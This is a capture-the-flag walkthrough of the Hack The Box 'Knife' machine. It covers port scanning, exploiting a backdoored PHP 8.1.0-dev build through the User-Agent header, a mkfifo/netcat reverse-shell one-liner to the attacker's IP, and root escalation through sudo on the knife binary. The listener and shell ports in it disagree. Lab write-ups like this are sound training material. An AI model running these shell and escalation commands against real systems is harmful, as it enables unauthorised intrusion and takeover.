Knife HacktheBox Walkthrough
Today we are going to solve the lab name as Knife –Hack the Box. The purpose is to accept the challenge to root the machine. Usage of sudo rights and remote code execution to pwn the victim’s machine.
Table of Content
- RCE (Python)
- Sudo Rights
Kali: Attacker Machine
Victim’s Machine: HTB
Run the Nmap to know the open ports and services.
nmap –A 10.129.223.91
As per the Nmap result, two ports are opened i.e. port 80 -HTTP and port 22 –SSH.
So now our only avenue of attack is through port 80 and port 22.
In the first look, we navigate port 80 in the web browser. But nothing informative we achieve here.
Without losing hope we move forward with the web scanner tool name as “Nikto” to get the vulnerability if any.Run the below command and output reveals the retrieved x-powered by the header as PHP/8.1.0-dev
nikto –h 10.129.223.91
Let’s Google the PHP8.1 exploit.
Above we find that PHP version 8.1 is vulnerable and allow us to do remote code execution. If this version runs on a server, an attacker can execute arbitrary code by sending the User-Agent header.
On exploit db, we get the exploit EBD –ID 49933 download the script from the below link and save it.
Execute the downloaded script on the kali and enter the full host URL of the victim’s machine (HTB machine). Simultaneously, run the netcat listener on port 1234 the next terminal.
nc –lvp 2334 python3 49933.py http://10.129.223.91
In the above screenshot, we are getting the garbage issue in the shell. Let’s take a reliable shell.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.100 1234 >/tmp/f
Wow!! On the netcat terminal, we have a session, and now the journey of enumeration starts and gets the user.txt.
But our hunger is for root.txt.Let’s proceed to the root flag.
I notice something interesting with sudo rights.
As shown in the above screenshot, user James may run with /usr/bin/knife as a root because he has the sudo privileges with no password.
Let’s see what gtfobins said about the knife:
Knife: This is capable of running ruby code. If the binary is allowed to run as a superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
Below is the command to run
sudo /usr/bin/knife exec -E 'exec "/bin/sh"' cd /root ls cat root.txt
Finally, We capture the flag.
Author: Nisha Sharma is an Experienced and Certified Security Consultant.Highly skilled in Infrastructure, web pentesting along with SIEM and other security devices. Connect with her here